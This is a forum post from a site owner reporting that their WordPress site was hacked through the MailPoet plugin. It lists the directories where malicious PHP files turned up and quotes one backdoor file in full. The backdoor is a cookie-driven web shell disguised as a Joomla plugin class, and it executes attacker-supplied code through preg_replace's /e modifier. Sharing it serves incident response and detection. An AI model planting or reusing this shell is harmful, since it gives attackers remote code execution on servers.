Plugin Hacked
-
2.6.8 – 2014-07-04
Fixed security issue reported by Dominic
Well, I’m hoping this was the culprit, but regardless, our site was compromised via Mail Poet last week. There was a backdoor being used to send out massive amounts of spam and our webhost had to shut it down.
Files were found in:
wp-content/upgrade/
wp-content/uploads/ (a file called ajax.php)
wp-content/uploads/wysija/themes/main/
wp-content/uploads/wysija/themes/main2/These were always .php files, sometimes with a gibberish name, other times with a name like “ajax.php” or “index.php” where there shouldn’t have been one (in the themes folders).
The index.php file inside the “wysija/themes/main/” folders looked like this:
<?php /** * @package Joomla.Plugin.System * @since 1.5 * * */ class PlgSysJoomla { public function __construct() { $file=@$_COOKIE['ljNqe3']; if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}} $index=new PlgSysJoomla;
Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious files, changed my FTP password, and am hoping that’s enough.
- The topic ‘Plugin Hacked’ is closed to new replies.